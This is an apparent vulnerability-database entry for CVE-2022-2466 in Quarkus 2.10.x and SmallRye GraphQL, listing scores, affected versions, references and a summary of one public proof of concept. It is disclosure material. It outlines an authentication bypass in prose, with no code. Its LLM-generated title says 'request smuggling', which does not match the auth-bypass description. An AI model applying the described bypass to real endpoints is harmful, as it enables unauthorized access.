CVE-2022-2466

CRITICAL

Quarkus 2.10.0-2.10.3 - HTTP Request Smuggling via Header Context Mismanagement

Title source: llm
STIX 2.1

Exploitation Summary

EIP tracks 1 public exploit for CVE-2022-2466. PoCs published by yuxblank.

AI-analyzed exploit summary This PoC demonstrates an authentication bypass vulnerability in SmallRye GraphQL (CVE-2022-2466) where the request context is not properly terminated, allowing unauthorized access to GraphQL endpoints. The exploit involves sending a valid JWT token followed by a request without authentication, which incorrectly succeeds due to improper context management.

Description

It was found that Quarkus 2.10.x does not terminate HTTP requests header context which may lead to unpredictable behavior.

Exploits (1)

nomisec WORKING POC 1 stars
by yuxblank · poc
https://github.com/yuxblank/CVE-2022-2466---Request-Context-not-terminated-with-GraphQL

This PoC demonstrates an authentication bypass vulnerability in SmallRye GraphQL (CVE-2022-2466) where the request context is not properly terminated, allowing unauthorized access to GraphQL endpoints. The exploit involves sending a valid JWT token followed by a request without authentication, which incorrectly succeeds due to improper context management.

Classification
Working Poc 90%
Attack Type
Auth Bypass
Complexity
Moderate
Reliability
Reliable
Target: SmallRye GraphQL (Quarkus)
Auth required
Prerequisites: Valid JWT token for initial request · Access to GraphQL endpoint
devstral-2 · analyzed Feb 16, 2026 Full analysis →

References (1)

Core 1
Core References
Exploit, Issue Tracking, Third Party Advisory x_refsource_misc
https://github.com/quarkusio/quarkus/issues/26748

Scores

CVSS v3 9.8
EPSS 0.1278
EPSS Percentile 94.2%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Details

CWE
CWE-444
Status published
Products (2)
io.quarkus/quarkus-core-parent 2.10.0 - 2.10.4Maven
quarkus/quarkus 2.10.0 - 2.10.4
Published Aug 31, 2022
Tracked Since Feb 18, 2026